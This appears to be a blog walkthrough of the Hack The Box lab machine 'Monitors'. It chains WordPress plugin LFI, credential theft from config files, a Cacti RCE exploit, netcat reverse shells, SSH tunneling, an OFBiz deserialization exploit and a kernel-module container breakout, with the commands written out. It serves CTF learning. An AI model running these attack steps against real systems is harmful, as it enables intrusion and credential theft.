Monitors is an active machine from hackthebox. So, unless you are extremely desperate to capture the flag, don’t proceed to the walkthrough. Also, I will try shortening the walkthrough as much as possible. “Monitors Walkthrough – Hackthebox – Writeup”
Note: To write public writeups for active machines is against the rules of HTB. Otherwise, I could protect this blog post using the root flag. Also, I couldn’t find best content locker that allows custom message for wordpress. So, I couldn’t password protect this blog post using other methods like root hash, root only readable file contents, etc.
Walkthrough of spectra from hackthebox
Firstly, let’s remove the default routed added by the VPN server.
sudo route del -net default gw 10.10.14.1 netmask 0.0.0.0 dev tun0
Nmap scan
nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.10.10.238
Enumerate web server
From the nmap results, we have an HTTP server to enumerate.
Direct access isn’t available. So, I added monitos.htb to the /etc/hosts file.
Upon opening with the host name, we get a wordpress website.
Hence, I used wpscan to find the vulnerable plugins.
wpscan --api-token $WPSCAN_KEY --url http://monitors.htb/ --plugins-detection mixed -e -o wpscan.log
cat wpscan.log
We got an unauthenticated file inclusion vulnerability in wp spritz plugin. Thus, I opened the links provided and also opened theburp suite proxy to move further. Then, I hit the request and sent it to intruder and repeater.
As we can see, the LFI worked. Since it’s using file_get_contents function, we cannot execute remote PHP codes. So, I decided to get the credentials from the machine. Hence, I looked for the configuration file of the wordpress.
I noted down the username and password for mysql. Also, I tried the password to log in as the WordPress admin and log in as marcus to SSH but didn’t succeed. Hence, I decided to check the apache configuration.
I did the fuzzing with the list above and found out that in the default configuration file, there is a comment.
Hence, I added the hostname to my hosts file.
Using admin and the password that I found earlier from the wp-config.php file gave me the access to the machine.
The version of the service is 1.2.12 that has an authenticated remote code execution exploit.
Reference: https://www.exploit-db.com/exploits/49810
nc -nlvp 4444
# On another tab
python3 exploit.py -t http://cacti-admin.monitors.htb -u admin -p <password> --lhost 10.10.14.60 --lport 4444
Finally, I got the foothold.
Get user’s shell
First thing, you want to do is make the shell interactive. Otherwise, you are going to regret later. I looked for some stuff manually, but didn’t find anything. Hence, I decided to download the linux enumeration scripts like linpeas, linenum, pspy, etc. However, both wget and curl aren’t installed on the target. Luckily, we have netcat on the machine. Hence, I listened as follows in my local machine.
nc -nlvp 5555 < linpeas.sh
On the target, I did the following.
cd /tmp
nc 10.10.14.60 5555 > linpeas.sh
I repeated the same for other binaries too and ran the scripts. However, it didn’t give me anything. Then, I searched all files owned by another user and I didn’t find anything. However, when I looked at the home directory of marcus, there is a directory .backup that has unusual permissions. So, I searched for the word marcus in the files of different directories that didn’t have binaries.
grep 'marcus' /etc -R 2>/dev/null
So, I looked at the content of the file.
cat /home/marcus/.backup/backup.sh
I got a password that could give me the SSH access to the user marcus.
Get root access
There is a note which refers about docker. So, I listed down the listening ports.
Hence, I did the SSH tunneling of the port.
ssh -L 8443:127.0.0.1:8443 -R 4444:127.0.0.1:4444 -R 8080:127.0.0.1:8080 [email protected]
The version has a exploit related to deserialization.
https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialiation/
Next, I used python to create another reverse shell on my local machine. That would allow me to make the shell more interactive using stty.
Now, we are into the docker container. After this, we have to breakout from the container to the host.
cpash --print
The capability cap_sys_module would allow us to breakout from the container.
Following the guide, I copied the source code to get a reverse shell. I changed the IP and the port so that I would listen on the host. For that, I first copied the code to my local machine, edited it and then copied it to the container ‘/’ path.
Then, I created the Makefile.
Then, I made the kernel module.
make
It didn’t work. So, I copied the two files to ‘/’ of the container Then, added the gcc library to the path.
mv reverse-shell.c /
mv Makefile /
cd /
export PATH=$PATH:/usr/lib/gcc/x86_64-linux-gnu/8/
make clean
make
It was succeeded and I could see some new files on the directory. Then, I listened on the port 4445 of the host machine with the SSH login.
nc -nlvp 4445
Lastly, I executed the exploit on the docker container.
insmod reverse-shell.ko
This might not work because you might be working on the shared environment. So, reset your machine and repeat the steps and voila.
I got the root shell from the monitors host.